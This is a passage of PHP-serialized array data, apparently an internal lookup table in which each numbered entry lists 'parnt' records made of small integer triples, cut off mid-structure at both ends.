parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}}i:172;a:6:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}}i:173;a:1:{i:67;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:131;i:1;i:0;i:2;i:1;}}}}i:174;a:7:{i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:132;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:133;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:69;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:134;i:1;i:0;i:2;i:1;}}}}i:175;a:5:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:135;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:176;a:2:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}}i:177;a:2:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:130;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}}i:178;a:3:{i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:179;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:180;a:4:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:136;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}}i:181;a:6:{i:41;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:137;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:138;i:1;i:0;i:2;i:1;}}}i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:34;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:17;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:182;a:1:{i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:139;i:1;i:0;i:2;i:1;}}}}i:183;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:184;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:185;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:70;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}}i:186;a:3:{i:19;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:140;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}}i:187;a:2:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:142;i:1;i:0;i:2;i:1;}}}}i:188;a:5:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:69;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:143;i:1;i:0;i:2;i:1;}}}}i:189;a:7:{i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:39;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:77;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:144;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:139;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:190;a:1:{i:67;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:131;i:1;i:0;i:2;i:1;}}}}i:191;a:10:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:145;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:145;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:145;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:146;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:147;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:148;i:1;i:0;i:2;i:1;}}}}i:192;a:1:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:130;i:1;i:0;i:2;i:1;}}}}i:193;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}}i:194;a:8:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:100;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:149;i:1;i:0;i:2;i:1;}}}i:69;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:150;i:1;i:0;i:2;i:1;}}}i:66;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}}i:195;a:15:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:148;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:145;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:151;i:1;i:0;i:2;i:1;}}}i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:152;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:153;i:1;i:0;i:2;i:1;}}}i:23;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}}i:197;a:4:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:154;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:155;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}}i:198;a:3:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}}i:199;a:3:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:157;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:90;i:1;i:0;i:2;i:1;}}}i:21;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:51;i:1;i:0;i:2;i:1;}}}}i:200;a:4:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:120;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:120;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:158;i:1;i:0;i:2;i:1;}}}}i:201;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:202;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:203;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:159;i:1;i:0;i:2;i:1;}}}}i:204;a:4:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:124;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:124;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:160;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}}i:205;a:2:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}}i:206;a:16:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:162;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:164;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:71;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:165;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:166;i:1;i:0;i:2;i:1;}}}i:51;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:167;i:1;i:0;i:2;i:1;}}}}i:207;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:208;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:209;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:210;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:211;a:4:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:154;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:168;i:1;i:0;i:2;i:1;}}}}i:212;a:2:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:213;a:2:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:169;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:68;i:1;i:0;i:2;i:1;}}}}i:214;a:3:{i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:170;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:215;a:3:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:216;a:17:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:46;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:69;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:70;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:71;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:72;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:73;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:74;i:1;i:0;i:2;i:3;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:171;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:75;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:172;i:1;i:0;i:2;i:1;}}}}i:217;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:218;a:8:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:91;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:173;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}}i:219;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:220;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:221;a:7:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:222;a:7:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:91;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}}i:223;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:224;a:10:{i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:174;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:175;i:1;i:0;i:2;i:1;}}}i:72;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:174;i:1;i:0;i:2;i:1;}}}i:47;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:91;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:176;i:1;i:0;i:2;i:1;}}}}i:225;a:7:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:154;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:177;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:178;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:179;i:1;i:0;i:2;i:1;}}}}i:226;a:2:{i:72;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:227;a:1:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:228;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:229;a:12:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:91;